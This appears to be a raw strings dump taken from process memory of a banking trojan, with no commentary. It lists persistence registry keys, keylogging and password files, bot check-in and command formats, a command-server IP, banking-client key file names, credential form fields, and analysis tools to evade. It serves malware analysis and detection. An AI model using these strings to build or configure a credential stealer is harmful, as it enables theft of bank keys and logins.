software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
http://
http://
https://
https://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.bing.com
www.microsoft.com
www.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1104_rwx_02C30000_0006A000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
<>http
<>http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
http://
http://
https://
https://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.bing.com
www.microsoft.com
www.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
SYSTEM!XP3!F9BE9A8A
SYSTEM!XP3!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
MSCTF.Shared.MUTEX.ffffff00
%Documents and Settings%\NetworkService\Application Data\
%Documents and Settings%\NetworkService\Application Data\
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1156_rwx_00860000_0005B000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
<>http
<>http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
